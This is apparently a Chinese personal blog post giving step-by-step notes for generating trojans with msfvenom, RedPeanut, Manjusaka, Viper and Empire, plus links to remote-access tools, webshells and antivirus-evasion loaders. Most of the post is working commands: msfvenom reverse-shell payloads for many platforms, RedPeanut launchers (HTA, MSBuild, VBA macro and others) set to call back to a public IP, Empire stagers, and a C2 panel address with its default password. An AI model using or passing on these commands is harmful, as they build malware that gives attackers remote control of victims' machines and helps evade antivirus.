首页 信息安全

总想去抓住光,可它没有形状,抓不住也不敢直视。

# 1.msf 生成木马

参考地址:https://blog.csdn.net/qq_42094992/article/details/109004560

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f exe > ~/Trojan/MSF_Trojan/MSF_windows_reverse.exe

#linux
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f elf > ~/Trojan/MSF_Trojan/MSF_linux_reverse.elf

#mac
msfvenom -p osx/x64/shell_reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f macho > ~/Trojan/MSF_Trojan/MSF_mac_reverse.macho

#android
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 R > ~/Trojan/MSF_Trojan/MSF_android_reverse.apk

#php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_php_reverse.php

#jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_jsp_reverse.jsp

#asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f asp > ~/Trojan/MSF_Trojan/MSF_asp_reverse.asp

#war
msfvenom -p java/jsp_shell_reverse_tcp  LHOST=192.168.200.209 LPORT=8888 -f war > ~/Trojan/MSF_Trojan/MSF_war_reverse.war

#python
msfvenom -p cmd/unix/reverse_tcp  LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_python_reverse.py

#perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_perl_reverse.pl

#sh
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.200.209 LPORT=8888 -f raw > ~/Trojan/MSF_Trojan/MSF_sh_reverse.sh

#java--不需要此马
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.200.209 LPORT=8888 -f jar > ~/Trojan/MSF_Trojan/MSF_java_reverse.jar
./tools/jar2exe/jar2exe.sh MSF_java.jar MSF_java.class

# 2.RedPeanut 生成木马

github 地址:https://github.com/b4rtik/RedPeanut

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# 安装dotnet
rpm -Uvh https://packages.microsoft.com/config/rhel/7/packages-microsoft-prod.rpm
yum install dotnet-sdk-2.2
dotnet
dotnet build
dotnet run

#设置监听器
c2 list 
listener options http
set name RedPeanut_listener
set lhost 47.102.120.55
set lport 4444
run

#exe
launcher
exe
set filename RedPeanut_exe.exe
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

#dll 
launcher 
dll
set filename RedPeanut_dll.dll
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

#powershell
launcher 
powershell
set filename RedPeanut_ps1.ps1
set hosted False
set lport 4444
set profile 2
options
run

#Hta (vbs,powershell)
launcher
hta
set filename RedPeanut_hta.hta
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

#InstallUtil
launcher
installutil
set filename RedPeanut_installutil.installutil
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

#MSBuild
launcher
msbuild
set filename RedPeanut_msbuild.msbuild
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

#Macro/VBA
launcher
vba
set filename RedPeanut_vba.vba
set lhost 47.102.120.55
set lport 4444
set profile 2
options
run

# 3.Manjusaka 生成木马

github 地址:https://github.com/YDHCUI/manjusaka/releases

1
2
3
4
5
6
7
#设置权限并运行
chmod +x manjusaka
./manjusaka

#web界面与初始密码
http://47.102.120.55:3200/manjusaka/static/
初始用户: manjusaka   密码: 402432f678e74cb7

# 4.Viper 生成木马

使用教程:https://www.yuque.com/vipersec/help/olg1ua

1
2
3
4
5
6
7
8
#f8x一键安装
sysctl -w vm.max_map_count=262144
curl -o f8x https://f8x.io/   # wget -O f8x https://f8x.io/
bash f8x -viper

#访问web生成payload
https://vpsip:60000/#/user/login
用户名:root 密码:****自定义密码**

# 5.Empire 生成木马

github 地址:https://github.com/EmpireProject/Empire
使用教程:https://blog.csdn.net/u013930899/article/details/124871901 https://www.cnblogs.com/yokan/p/13179730.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#安装环境
docker pull empireproject/empire
docker run -it -p 7000:7000 --name empire empireproject/empire /bin/bash

​#需要先升级pip
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python get-pip.py

# 安装缺少的依赖
ln -s /usr/local/bin/pip2.7 /usr/bin/pip
pip install pefile  
sudo ./empire

#生成Empire木马
listeners
uselistener http
info
set Name bk
set Port 8888
execute
back
usestager windows/launcher_bat bk
usestager multi/bash bk
usestager windows/dll bk
usestager windows/wmic bk
usestager windows/launcher_bat bk
usestager windows/launcher_vbs bk
info
execute

# 6. 大灰狼远控

github 地址:https://github.com/0xCuSO4/DHLYK

1
#实际生成的源码是在bilibili找到的,链接没找到

# 7. 大马

github 地址:https://github.com/Aabyss-Team/WebShell

# 8.gh0st

github 地址:https://github.com/iGh0st/gh0st3.6_src https://github.com/SecurityNo1/Gh0st2023 https://github.com/Cc28256/CcRemote/

1
#环境没有配置好,没有生成此工具的马

# 9.Shellcode to exe

github 地址:https://github.com/NyDubh3/CuiRi https://github.com/1y0n/AV_Evasion_Tool
简介:掩日 - 免杀执行器生成工具,可将 shellcode 加载为可执行 exe

1
#环境没有配置好,没有生成此工具的马

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

.N1h1l157 微信支付

微信支付

.N1h1l157 支付宝

支付宝

.N1h1l157 贝宝

贝宝